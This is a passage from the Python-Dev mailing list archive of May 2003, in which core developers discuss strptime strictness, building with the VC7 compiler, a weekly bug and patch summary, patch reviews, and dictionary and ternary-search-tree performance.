versions do.  I have just been patching strptime the best I can to 
handle strange edge cases that pop up and work as people like Kevin need 
it to.

Unless you are suggesting a flag that when set controls whether the 
Python version or a libc version if available is used, which I guess 
could work as a transition to get people to move over.  Is this what you 
are getting at, Guido?  And if it is, do you want it at the function or 
module level?  I say function, but that is because it would be easier to 
code.  =)

>>And while we are on this subject, does anyone have any issues if I cause
>>_strptime to recognize UTC and GMT as timezones?  The Solaris box I always
>>use to do libc strptime comparisons to does not recognize it as an
>>acceptable value for %Z, but since it is a known fact that neither have
>>daylight savings I feel _strptime should recognize this fact and set the
>>daylight savings value to 0 insteading of raising an error saying it
>>doesn't know about that timezone.
>>
>>Any objections to the change?
> 
> 
> Go for it.
> 

Great.  Once we have settled on this possible strict flag I will make 
the change to _strptime.

-Brett



From mal@lemburg.com  Sat May 10 08:32:38 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 10 May 2003 09:32:38 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBC1581.3060303@v.loewis.de>
References: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net>	<3EBC0C5B.7030101@lemburg.com> <3EBC1581.3060303@v.loewis.de>
Message-ID: <3EBCAB16.3080007@lemburg.com>

Martin v. L=F6wis wrote:
> M.-A. Lemburg wrote:
>=20
>>> AFAIK, current CVS Python compiles under VC7 now.
>>
>>
>> That's nice :-) I meant: adding features from VC7 to Python.
>=20
> That is done as well. There is quite some conditional code that
> selects features available only in VC7, such as usage of
> getaddrinfo in the socket module.

Cool, so the time machine has worked again :-)

--=20
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 10 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        45 days left



From mal@lemburg.com  Sat May 10 08:35:44 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 10 May 2003 09:35:44 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
Message-ID: <3EBCABD0.7050700@lemburg.com>

Tim Peters wrote:
> [MAL]
> 
>>>>How about adding support for VC7 features in 2.4
> 
> [Tim]
> 
>>>AFAIK, current CVS Python compiles under VC7 now.
> 
> [MAL]
> 
>>That's nice :-) I meant: adding features from VC7 to Python.
> 
> Umm, could you name one?  VC7 is a compiler to me.  I don't what it means to
> add a compiler feature to Python, so transformed the suggestion into one I
> understood.

There must be some or else why would someone want to buy VC7
(apart from trying to be hype-compliant) ?

>>>>and starting the transition in 2.5 ?
> 
>>>I expect that mostly depends on who's doing the work.  PLabs Windows
>>>development is on auto-pilot (aka benign neglect).  The first person to
>>>volunteer time to do anything here gets to set the policy for
>>>the next two decades <0.9 wink>.
> 
>>How come ? I always thought that Zope's main deployment platform
>>is Windows....
> 
> I don't know, but doubt it, and Windows users are conspicuous by absence on
> the public Zope dev mailing lists.  Regardless, Zope strives to be a
> platform-neutral application, so I've never been surprised that Zope Corp's
> interest in Windows-specific Python work has been undetectable.

Interesting. I find that most downloads for our Zope software
tend to be for the win32 platform.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 10 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        45 days left



From martin@v.loewis.de  Sat May 10 08:53:26 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 10 May 2003 09:53:26 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBCABD0.7050700@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
 <3EBCABD0.7050700@lemburg.com>
Message-ID: <m3ptmr2q6h.fsf@mira.informatik.hu-berlin.de>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> There must be some or else why would someone want to buy VC7
> (apart from trying to be hype-compliant) ?

There are many reasons to buy VC7. I assume the typical reasons are
- if you never had a Microsoft compiler, and buy one now, it will
  be 7.x (you may not even get VC6 anymore)
- the C++ compiler has much improved
- debugging was improved
- it includes a more recent Windows SDK, exposing functions available
  on W2k+
- it supports C# and .NET development

Of those reasons, few are relevant for Python, except that some people
are now using VC7 exclusively for other reasons, and want a VC7-built
python to better integrate their extensions.

Regards,
Martin


From guido@python.org  Sat May 10 18:42:51 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 10 May 2003 13:42:51 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: "Your message of Fri, 09 May 2003 19:13:35 PDT."
 <3EBC604F.7040306@ocf.berkeley.edu>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
 <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>
 <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU>
 <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net>
 <3EBC604F.7040306@ocf.berkeley.edu>
Message-ID: <200305101742.h4AHgpv13692@pcp02138704pcs.reston01.va.comcast.net>

> > [Brett]
> > 
> >>>>I got a single email from someone asking me to change the
> >>>>functionality so that it would raise an exception if part of the
> >>>>input string was not parsed.
> >>>
> > [Guido van Rossum]
> > 
> >>>That sounds like a good idea on the face of it.  Or will this break
> >>>existing code?
> > 
> > 
> > [Brett]
> > 
> >>Maybe.  If they depend on some specific behavior on a platform that offers
> >>it, then yes, there could be issues.  But since the docs are so vague if
> >>it does break code it will most likely be because someone didn't follow
> >>the warnings in the spec.
> > 
> > 
> > If you add some flag to control this behavior, defaulting to strict,
> > then at least people who rely on the old (non-strict) behavior can use
> > the flag rather than redesign their application.
> > 
> 
> But the problem is that I have no idea what the old behavior is.  Since 
> the spec is so vague and open I have no clue what all the various libc 
> versions do.  I have just been patching strptime the best I can to 
> handle strange edge cases that pop up and work as people like Kevin need 
> it to.

OK.  Maybe I misunderstood (I've now got to admit that I've never
tried strptime myself).  From your initial message (still quoted
above) I thought that it was a simple case of strptime parsing as much
as it could and then giving up (sort of like sscanf), and that the
suggestion you received was to make it insist on parsing everything or
fail.  I still think that would be a clear improvement.  But if the
original situation wasn't as clear-cut, maybe I should have stayed out
of this...

> Unless you are suggesting a flag that when set controls whether the 
> Python version or a libc version if available is used, which I guess 
> could work as a transition to get people to move over.  Is this what you 
> are getting at, Guido?  And if it is, do you want it at the function or 
> module level?  I say function, but that is because it would be easier to 
> code.  =)

No, that's not what I was going for at all -- I think that would be a
mistake that woud just cause people to worry needlessly about which
strptime version they should use.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From drifty@alum.berkeley.edu  Sat May 10 19:29:07 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 10 May 2003 11:29:07 -0700
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <200305101742.h4AHgpv13692@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com> <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU> <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net> <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU> <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net> <3EBC604F.7040306@ocf.berkeley.edu> <200305101742.h4AHgpv13692@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EBD44F3.9020904@ocf.berkeley.edu>

Guido van Rossum wrote:
>>>[Brett]
>>>
>>>
>>>>>>I got a single email from someone asking me to change the
>>>>>>functionality so that it would raise an exception if part of the
>>>>>>input string was not parsed.
>>>>>
>>>[Guido van Rossum]
>>>
>>>
>>>>>That sounds like a good idea on the face of it.  Or will this break
>>>>>existing code?
>>>
>>>
>>>[Brett]
>>>
>>>
>>>>Maybe.  If they depend on some specific behavior on a platform that offers
>>>>it, then yes, there could be issues.  But since the docs are so vague if
>>>>it does break code it will most likely be because someone didn't follow
>>>>the warnings in the spec.
>>>
>>>
>>>If you add some flag to control this behavior, defaulting to strict,
>>>then at least people who rely on the old (non-strict) behavior can use
>>>the flag rather than redesign their application.
>>>
>>
>>But the problem is that I have no idea what the old behavior is.  Since 
>>the spec is so vague and open I have no clue what all the various libc 
>>versions do.  I have just been patching strptime the best I can to 
>>handle strange edge cases that pop up and work as people like Kevin need 
>>it to.
> 
> 
> OK.  Maybe I misunderstood (I've now got to admit that I've never
> tried strptime myself).  From your initial message (still quoted
> above) I thought that it was a simple case of strptime parsing as much
> as it could and then giving up (sort of like sscanf), and that the
> suggestion you received was to make it insist on parsing everything or
> fail.  I still think that would be a clear improvement.  But if the
> original situation wasn't as clear-cut, maybe I should have stayed out
> of this...
> 

I wasn't clear enough.  I already patched strptime to raise an error if 
there is anything left that was not parsed (my first CVS checkin 
actually); this functionality is already there.  So I think we just 
talked ourselves in a circle.  =)

> 
>>Unless you are suggesting a flag that when set controls whether the 
>>Python version or a libc version if available is used, which I guess 
>>could work as a transition to get people to move over.  Is this what you 
>>are getting at, Guido?  And if it is, do you want it at the function or 
>>module level?  I say function, but that is because it would be easier to 
>>code.  =)
> 
> 
> No, that's not what I was going for at all -- I think that would be a
> mistake that woud just cause people to worry needlessly about which
> strptime version they should use.
> 

Well, now that I think we have the whole strict parsing cleared up, I 
assume we don't need this anymore.  Is there any other worries?

-Brett




From drifty@alum.berkeley.edu  Sat May 10 19:29:21 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 10 May 2003 11:29:21 -0700
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <200305101742.h4AHgpv13692@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com> <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU> <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net> <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU> <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net> <3EBC604F.7040306@ocf.berkeley.edu> <200305101742.h4AHgpv13692@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EBD4501.9080906@ocf.berkeley.edu>

Guido van Rossum wrote:
>>>[Brett]
>>>
>>>
>>>>>>I got a single email from someone asking me to change the
>>>>>>functionality so that it would raise an exception if part of the
>>>>>>input string was not parsed.
>>>>>
>>>[Guido van Rossum]
>>>
>>>
>>>>>That sounds like a good idea on the face of it.  Or will this break
>>>>>existing code?
>>>
>>>
>>>[Brett]
>>>
>>>
>>>>Maybe.  If they depend on some specific behavior on a platform that offers
>>>>it, then yes, there could be issues.  But since the docs are so vague if
>>>>it does break code it will most likely be because someone didn't follow
>>>>the warnings in the spec.
>>>
>>>
>>>If you add some flag to control this behavior, defaulting to strict,
>>>then at least people who rely on the old (non-strict) behavior can use
>>>the flag rather than redesign their application.
>>>
>>
>>But the problem is that I have no idea what the old behavior is.  Since 
>>the spec is so vague and open I have no clue what all the various libc 
>>versions do.  I have just been patching strptime the best I can to 
>>handle strange edge cases that pop up and work as people like Kevin need 
>>it to.
> 
> 
> OK.  Maybe I misunderstood (I've now got to admit that I've never
> tried strptime myself).  From your initial message (still quoted
> above) I thought that it was a simple case of strptime parsing as much
> as it could and then giving up (sort of like sscanf), and that the
> suggestion you received was to make it insist on parsing everything or
> fail.  I still think that would be a clear improvement.  But if the
> original situation wasn't as clear-cut, maybe I should have stayed out
> of this...
> 

I wasn't clear enough.  I already patched strptime to raise an error if 
there is anything left that was not parsed (my first CVS checkin 
actually); this functionality is already there.  So I think we just 
talked ourselves in a circle.  =)

> 
>>Unless you are suggesting a flag that when set controls whether the 
>>Python version or a libc version if available is used, which I guess 
>>could work as a transition to get people to move over.  Is this what you 
>>are getting at, Guido?  And if it is, do you want it at the function or 
>>module level?  I say function, but that is because it would be easier to 
>>code.  =)
> 
> 
> No, that's not what I was going for at all -- I think that would be a
> mistake that woud just cause people to worry needlessly about which
> strptime version they should use.
> 

Well, now that I think we have the whole strict parsing cleared up, I 
assume we don't need this anymore.  Is there any other worries?

-Brett




From tim@zope.com  Sun May 11 03:46:18 2003
From: tim@zope.com (Tim Peters)
Date: Sat, 10 May 2003 22:46:18 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <Pine.LNX.4.44.0305091042030.5143-100000@penguin.theopalgroup.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFDEFAB.tim@zope.com>

[Kevin Jacobs, on strptime]
> I've just retested with my original code and it does look like Brett has
> indeed fixed it.  Or at least fixed it to the point that mktime doesn't
> croak on Linux, Solaris, Tru64, and IRIX with our app.

Great!  Hats off to Brett.

>> ...  the problem is that how strptime behaves varies in fact across
>> boxes.

> Or more importantly that strptime is now standardized in Python, while
> mktime is not.

Ya, that one's a real problem.  The new-in-2.3 datetime module supplies a
saner way to deal with dates & times, but is new, and is probably lacking
some features some people need.  The problem with mktime() is that Python
also wants nice ways to play with random C libraries on your platform, and
platform mktime() implementations are *really* different (they vary in their
beliefs about when "the epoch" begins, what the first representable year is,
what the last representable year is, and whether leap seconds exist; POSIX
gives clear snswers to the first and last, explicitly gives up on the middle
two, and not all Python platforms try to follow POSIX anyway).  So I expect
mktime() will remain a cross-platform mess forever -- else Python wouldn't
play nice with the mess that is your platform <0.9 wink>.

> Given that my previous problems with the Python strptime have been
> addressed, I am now +1 on using it (although I'm still going to
> avoid it and mktime in my code as much as possible).

Unfortunately, datetime doesn't supply a wholly sane way to do strftime yet,
and no way to do strptime.  The ISO formats are very easy (by design) to
parse, so those might be best to use in portable code.



From skip@mojam.com  Sun May 11 13:00:24 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 11 May 2003 07:00:24 -0500
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200305111200.h4BC0Ot21778@manatee.mojam.com>

Bug/Patch Summary
-----------------

415 open / 3632 total bugs (-7)
137 open / 2144 total patches (+2)

New Bugs
--------

bsddb.*open mode should default to 'r' rather than 'c' (2003-05-05)
	http://python.org/sf/732951
Need an easy way to check the version (2003-05-06)
	http://python.org/sf/733231
kwargs handled incorrectly (2003-05-06)
	http://python.org/sf/733667
PackMan recursive/force fails on pseudo packages (2003-05-07)
	http://python.org/sf/733819
Function for creating/extracting CoreFoundation types (2003-05-08)
	http://python.org/sf/734695
telnetlib.read_until: float req'd for timeout (2003-05-08)
	http://python.org/sf/734806
pyxml setup error on Mac OS X (2003-05-08)
	http://python.org/sf/734844
Lambda functions in list comprehensions (2003-05-08)
	http://python.org/sf/734869
Mach-O gcc optimisation flag can boost performance up to 10% (2003-05-09)
	http://python.org/sf/735110
urllib2 parse_http_list wrong return (2003-05-09)
	http://python.org/sf/735248
FILEMODE not honoured (2003-05-09)
	http://python.org/sf/735274
Command line timeit.py sets sys.path badly (2003-05-09)
	http://python.org/sf/735293
urllib / urllib2 should cache 301 redirections (2003-05-09)
	http://python.org/sf/735515
cStringIO.StringIO (2003-05-09)
	http://python.org/sf/735535
libwinsound.tex is missing MessageBeep() description (2003-05-10)
	http://python.org/sf/735674

New Patches
-----------

build of html docs broken (liboptparse.tex) (2003-05-04)
	http://python.org/sf/732174
Docs for test package (2003-05-04)
	http://python.org/sf/732394
Allows os.forkpty to work on more platforms (Solaris!) (2003-05-04)
	http://python.org/sf/732401
Make Tkinter.py's nametowidget work with cloned menu widgets (2003-05-07)
	http://python.org/sf/734176
time.tzset documentation (2003-05-08)
	http://python.org/sf/735051
Python2.3b1 makefile improperly installs IDLE (2003-05-10)
	http://python.org/sf/735613
Python makefile may install idle in the wrong place (2003-05-10)
	http://python.org/sf/735614
Pydoc.py fixes links (2003-05-10)
	http://python.org/sf/735694

Closed Bugs
-----------

textwrap has problems wrapping hyphens (2002-08-17)
	http://python.org/sf/596434
httplib HEAD request fails - keepalive (2002-10-11)
	http://python.org/sf/622042
new.function ignores keyword arguments (2003-02-25)
	http://python.org/sf/692959
Mention gmtime in Chapter 6.9 "Time access and conversions" (2003-03-05)
	http://python.org/sf/697983
Clarify timegm documentation (2003-03-05)
	http://python.org/sf/697986
Clarify daylight variable meaning (2003-03-05)
	http://python.org/sf/697988
Clarify mktime semantics (2003-03-05)
	http://python.org/sf/697989
Problems building python with tkinter on HPUX... (2003-03-17)
	http://python.org/sf/704919
OpenBSD 3.2: make altinstall dumps core (2003-03-29)
	http://python.org/sf/712056
cPickle fails to pickle inf (2003-04-03)
	http://python.org/sf/714733
urlopen(url_to_a_non-existing-domain) raises gaierror (2003-04-18)
	http://python.org/sf/723831
textwrap.wrap infinite loop (2003-04-23)
	http://python.org/sf/726446
use bsddb185 if necessary in dbhash (2003-04-24)
	http://python.org/sf/727137
email parsedate still wrong (PATCH) (2003-04-25)
	http://python.org/sf/727719
Tools/msgfmt.py results in two warnings under Python 2.3b1 (2003-04-26)
	http://python.org/sf/728277
setup.py breaks during build of Python-2.3b1 (2003-04-27)
	http://python.org/sf/728322
Long file names in osa suites (2003-04-27)
	http://python.org/sf/728574
ConfigurePython gives depreaction warning (2003-04-27)
	http://python.org/sf/728608
Unexpected Changes in list Iterator (2003-04-30)
	http://python.org/sf/730296
HTTPRedirectHandler variable out of scope (2003-05-01)
	http://python.org/sf/730963
urllib2 raises AttributeError on redirect (2003-05-01)
	http://python.org/sf/731116
IDE "lookup in documentation" doesn't work in interactive wi (2003-05-02)
	http://python.org/sf/731643
GIL not released around getaddrinfo() (2003-05-02)
	http://python.org/sf/731644

Closed Patches
--------------

textwrap.dedent, inspect.getdoc-ish (2002-08-21)
	http://python.org/sf/598163
release GIL around getaddrinfo() (2002-09-03)
	http://python.org/sf/604210
Allow more Unicode on sys.stdout (2002-09-21)
	http://python.org/sf/612627
MSVC 7.0 compiler support (2002-09-25)
	http://python.org/sf/614770
Port tests to unittest (2003-01-05)
	http://python.org/sf/662807
Optimize dictionary resizing (2003-01-20)
	http://python.org/sf/671454
Dictionary tuning (2003-04-29)
	http://python.org/sf/729395
assert from longobject.c, line 1215 (2003-04-30)
	http://python.org/sf/730594


From tim@multitalents.net  Sun May 11 19:49:13 2003
From: tim@multitalents.net (Tim Rice)
Date: Sun, 11 May 2003 11:49:13 -0700 (PDT)
Subject: [Python-Dev] patch 718286
Message-ID: <Pine.UW2.4.53.0305111146450.11325@ou8.int.multitalents.net>

It would be nice to see patch 718286 (DESTIR variable patch) applied.
It would make package builder's life easier.

-- 
Tim Rice				Multitalents	(707) 887-1469
tim@multitalents.net



From martin@v.loewis.de  Sun May 11 21:53:33 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 11 May 2003 22:53:33 +0200
Subject: [Python-Dev] patch 718286
In-Reply-To: <Pine.UW2.4.53.0305111146450.11325@ou8.int.multitalents.net>
References: <Pine.UW2.4.53.0305111146450.11325@ou8.int.multitalents.net>
Message-ID: <m3fznlw6gi.fsf@mira.informatik.hu-berlin.de>

Tim Rice <tim@multitalents.net> writes:

> It would be nice to see patch 718286 (DESTIR variable patch) applied.
> It would make package builder's life easier.

Done.

Martin


From drifty@alum.berkeley.edu  Mon May 12 00:33:52 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sun, 11 May 2003 16:33:52 -0700
Subject: [Python-Dev] Need some patches checked
Message-ID: <3EBEDDE0.3040308@ocf.berkeley.edu>

Since I am trying to tackle patches that were not written by me for the 
first time I need someone to check that I am doing the right thing.

http://www.python.org/sf/649742 is a patch to make adding headers to 
urllib2's Request object have consistent case.  I cleaned up the patch 
and everything seems reasonable and I don't see how doing this will hurt 
backwards-compatibilty short of code that tried to add multiple headers 
of the same name with different case which is not legal anyway for HTTP.

http://www.python.org/sf/639139 is a patch wanting to remove an 
isinstance assertion.  Raymond initially suggested weakening the 
assertion to doing attribute checks.  I personally see no reason we 
can't just take the check out entirely since the code does not appear to 
have any place where it will mask an AttributeError exception and the 
comment for the assert says it is just for checking the interface.  But 
since Raymond initially wanted to go another direction I need someone to 
step in and give me some advice (or Raymond can look at it again; patch 
is old).

-Brett



From drifty@alum.berkeley.edu  Mon May 12 00:34:00 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sun, 11 May 2003 16:34:00 -0700
Subject: [Python-Dev] Need some patches checked
Message-ID: <3EBEDDE8.9020706@ocf.berkeley.edu>

Since I am trying to tackle patches that were not written by me for the 
first time I need someone to check that I am doing the right thing.

http://www.python.org/sf/649742 is a patch to make adding headers to 
urllib2's Request object have consistent case.  I cleaned up the patch 
and everything seems reasonable and I don't see how doing this will hurt 
backwards-compatibilty short of code that tried to add multiple headers 
of the same name with different case which is not legal anyway for HTTP.

http://www.python.org/sf/639139 is a patch wanting to remove an 
isinstance assertion.  Raymond initially suggested weakening the 
assertion to doing attribute checks.  I personally see no reason we 
can't just take the check out entirely since the code does not appear to 
have any place where it will mask an AttributeError exception and the 
comment for the assert says it is just for checking the interface.  But 
since Raymond initially wanted to go another direction I need someone to 
step in and give me some advice (or Raymond can look at it again; patch 
is old).

-Brett



From guido@python.org  Mon May 12 01:20:18 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 11 May 2003 20:20:18 -0400
Subject: [Python-Dev] Need some patches checked
In-Reply-To: "Your message of Sun, 11 May 2003 16:33:52 PDT."
 <3EBEDDE0.3040308@ocf.berkeley.edu>
References: <3EBEDDE0.3040308@ocf.berkeley.edu>
Message-ID: <200305120020.h4C0KIm29011@pcp02138704pcs.reston01.va.comcast.net>

> Since I am trying to tackle patches that were not written by me for the 
> first time I need someone to check that I am doing the right thing.
> 
> http://www.python.org/sf/649742 is a patch to make adding headers to 
> urllib2's Request object have consistent case.  I cleaned up the patch 
> and everything seems reasonable and I don't see how doing this will hurt 
> backwards-compatibilty short of code that tried to add multiple headers 
> of the same name with different case which is not legal anyway for HTTP.

Good!  I just noticed with disgust that the headers dict is case
currently case-sensitive, so that if I want to change the
Content-type header, I have to use the exact case used in the source.
I can't imagine b/w compatibility issues with this.

> http://www.python.org/sf/639139 is a patch wanting to remove an 
> isinstance assertion.  Raymond initially suggested weakening the 
> assertion to doing attribute checks.  I personally see no reason we 
> can't just take the check out entirely since the code does not appear to 
> have any place where it will mask an AttributeError exception and the 
> comment for the assert says it is just for checking the interface.  But 
> since Raymond initially wanted to go another direction I need someone to 
> step in and give me some advice (or Raymond can look at it again; patch 
> is old).

The advantage of the assert (or some other check) is to catch a type
error early, rather than 4 call levels deeper, where the source of the
AttributeError may not be obvious when it happens.  But I agree that
that is a minor issue, and for correct code removing the assert is
fine.  Checking exactly for the attributes that are (or may be) used
is probably overly expensive.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Mon May 12 01:38:01 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 12 May 2003 12:38:01 +1200 (NZST)
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <16E1010E4581B049ABC51D4975CEDB880113DAD1@UKDCX001.uk.int.atosorigin.com>
Message-ID: <200305120038.h4C0c1F23070@oma.cosc.canterbury.ac.nz>

> Specifically, mingw exploits a specific clause in the GPL which allows
> dependencies on "components of the OS". MSVCRT qualifies here, but
> MSVCR7 doesn't.

But surely any GPL issues with using mingw apply only
to libraries that mingw *itself* depends on, and then
only if one is redistributing a work derived from
mingw -- not to anything *created* with mingw?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From gh@ghaering.de  Mon May 12 02:26:38 2003
From: gh@ghaering.de (=?ISO-8859-1?Q?Gerhard_H=E4ring?=)
Date: Mon, 12 May 2003 03:26:38 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305120038.h4C0c1F23070@oma.cosc.canterbury.ac.nz>
References: <200305120038.h4C0c1F23070@oma.cosc.canterbury.ac.nz>
Message-ID: <3EBEF84E.4090704@ghaering.de>

Greg Ewing wrote:
>>Specifically, mingw exploits a specific clause in the GPL which allows
>>dependencies on "components of the OS". MSVCRT qualifies here, but
>>MSVCR7 doesn't.
> 
> But surely any GPL issues with using mingw apply only
> to libraries that mingw *itself* depends on, and then
> only if one is redistributing a work derived from
> mingw -- not to anything *created* with mingw?

That's my interpretation of the GPL, as well.

-- Gerhard


From tim.one@comcast.net  Mon May 12 02:47:33 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 11 May 2003 21:47:33 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <20030505201416.GB17384@barsoom.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>

[Agthorr]
> An alternate optimization would be the additional of an immutable
> dictionary type to the language, initialized from a mutable dictionary
> type.  Upon creation, this dictionary would optimize itself, in a
> manner similar to "gperf" program which creates (nearly) minimal
> zero-collision hash tables.

Possibly, but it's fraught with difficulties.  For example, Python dicts can
be indexed by lots of things besides 8-bit strings, and you generally need
to know a great deal about the internal structure of a key type to generate
a sensible hash function.  A more fundamental problem is that minimality can
be harmful when failing lookups are frequent:  a sparse table has a good
chance of hitting a null entry immediately then, but a minimal table never
does.  In the former case full-blown key comparison can be skipped when a
null entry is hit, in the latter case full-blown key comparison is always
needed on a failing lookup.

For symbol table apps, Bentley & Sedgewick rehabilitated the idea of ternary
search trees a few years ago, and I think you'd enjoy reading their papers:

    http://www.cs.princeton.edu/~rs/strings/

In particular, they're faster than hashing in the failing-lookup case.



From tim.one@comcast.net  Mon May 12 03:38:25 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 11 May 2003 22:38:25 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <2mist7nd62.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGGEFAB.tim.one@comcast.net>

[Jeremy Fincher]
>>> On another related front, sets (in my Python 2.3a2) raise KeyError on a
>>> .remove(elt) when elt isn't in the set.  Since sets aren't mappings,
>>> should that be a ValueError (like list raises) instead?

[Tim]
>> Since sets aren't sequences either, why should sets raise the
>> same exception lists raise?  It's up to the type to use whichever
>> fool exceptions it chooses.  This doesn't always make life easy for
>> users, alas -- there's not much consistency in exception behavior
>> across packages.  In this case, a user would be wise to avoid
>> expecting IndexError or KeyError, and catch their common base class
>> (LookupError) instead.  The distinction between IndexError and KeyError
>> isn't really useful (IMO; LookupError was injected as a base class
>> recently in Python's life).

[Michael Hudson]
> Without me noticing, too!  Well, I knew there was a lookup error that
> you get when failing to find a codec, but I didn't know IndexError and
> KeyError derived from it...
>
> Also note that Jeremy was suggesting *ValueError*, not IndexError...

Oops!  So he was -- I spaced out on that.

> that any kind of index-or-key-ing is going on is trivia of the
> implementation, surely?

Sure.  I don't care for ValueError in this context, though -- there's
nothing wrong with the value I'm testing for set membership, after all.  Of
course I never cared for ValueError on a failing list.remove() either.  I
like ValueError best when an input is of the right type but outside the
defined domain of a function, like math.sqrt(-1.0) or chr(500).  Failing to
find something feels more like a (possibly proper subclass of) LookupError
to me.  But I'd hate to create even more useless distinctions among
different kinds of lookup failures, so am vaguely happy reusing the KeyError
flavor of LookupError.

In any case, I'm not unhappy enough with it to do something about it.  I
nevertheless agree Jerry raised a good point, and maybe somebody else is
unhappy enough with it to change it?



From agthorr@barsoom.org  Mon May 12 04:28:18 2003
From: agthorr@barsoom.org (Agthorr)
Date: Sun, 11 May 2003 20:28:18 -0700
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
References: <20030505201416.GB17384@barsoom.org> <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
Message-ID: <20030512032817.GA31824@barsoom.org>

On Sun, May 11, 2003 at 09:47:33PM -0400, Tim Peters wrote:
> Possibly, but it's fraught with difficulties.  For example, Python dicts can
> be indexed by lots of things besides 8-bit strings, and you generally need
> to know a great deal about the internal structure of a key type to generate
> a sensible hash function.  

> A more fundamental problem is that minimality can be harmful when
> failing lookups are frequent: a sparse table has a good chance of
> hitting a null entry immediately then, but a minimal table never
> does.  In the former case full-blown key comparison can be skipped
> when a null entry is hit, in the latter case full-blown key
> comparison is always needed on a failing lookup.

Both good observations.

> For symbol table apps, Bentley & Sedgewick rehabilitated the idea of ternary
> search trees a few years ago, and I think you'd enjoy reading their papers:
> 
>     http://www.cs.princeton.edu/~rs/strings/
> 
> In particular, they're faster than hashing in the failing-lookup case.

hhmmm.. yes, those are interesting.  Thanks :-) A few months ago I
implemented suffix trees for fun and practice.  Suffix trees are based
on tries, and I used a binary-tree for each node to keep track of its
children (which the papers point out is an equivalent way of doing
ternary trees).

(Suffix trees let you input a set of strings of total length n.  This
has a cost of O(n) time and O(n) memory.  Then, you can look to see if
a string of length m is a substring of any of the strings in the set
in O(m) time; this is impressive since the number and size of the set
of strings only matters for the setup operation; it has no effect on
the lookup speed whatsoever.)

Ternary search trees seem like a good approach for string-only
dictionaries.  These seem like an inelegant optimization that might
yield performance improvements for places where non-string keys are
syntactically disallowed anyway (such as the members of a class or
module).

-- Agthorr


